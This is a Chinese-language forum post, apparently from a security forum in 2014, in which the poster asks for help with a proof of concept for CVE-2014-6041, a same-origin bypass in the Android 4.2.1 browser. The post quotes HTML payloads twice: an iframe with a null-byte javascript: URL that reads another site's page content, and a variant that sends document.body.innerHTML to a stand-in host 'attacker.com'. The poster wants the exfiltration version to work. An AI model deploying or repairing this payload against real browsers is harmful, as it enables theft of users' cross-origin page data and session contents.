-
-
[求助]CVE-2014-6041漏洞无法完全成功执行
-
发表于: 2014-10-14 09:38
-
CVE-2014-6041漏洞是android4.2.1平台上公布的一个同源策略绕过漏洞
网上公布的测试代码包括两部分,
一是
<iframe name="test"src="http://www.rhainfosec.com"></iframe>
<input type=button value="test"
onclick="window.open('\u0000javascript:alert(document.body.innerHTML)','test')">
这部分我在多个浏览器上测试都是能够正常执行的,的确绕过同源检查,弹出alert框
但第二部分,
<iframe name="test"src="http://www.rhainfosec.com"></iframe>
<input type=button value="test"
onclick="window.open('\u0000javascript:var i=newImage();i.src='//attacker.com?'+document.body.innerHTML;document.body.appendChild(i);','test')">
没有成功执行,服务器部分应该没错,我把attacker.com改称自己的asp服务器,自己测试都可以,就是在android平台上似乎这段javascript没有成功执行
哪位大神帮忙看看阿
网上公布的测试代码包括两部分,
一是
<iframe name="test"src="http://www.rhainfosec.com"></iframe>
<input type=button value="test"
onclick="window.open('\u0000javascript:alert(document.body.innerHTML)','test')">
这部分我在多个浏览器上测试都是能够正常执行的,的确绕过同源检查,弹出alert框
但第二部分,
<iframe name="test"src="http://www.rhainfosec.com"></iframe>
<input type=button value="test"
onclick="window.open('\u0000javascript:var i=newImage();i.src='//attacker.com?'+document.body.innerHTML;document.body.appendChild(i);','test')">
没有成功执行,服务器部分应该没错,我把attacker.com改称自己的asp服务器,自己测试都可以,就是在android平台上似乎这段javascript没有成功执行
哪位大神帮忙看看阿
[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入!
|
|
|---|---|
|
|
|
|
|
|
|
|
|
|
|
|
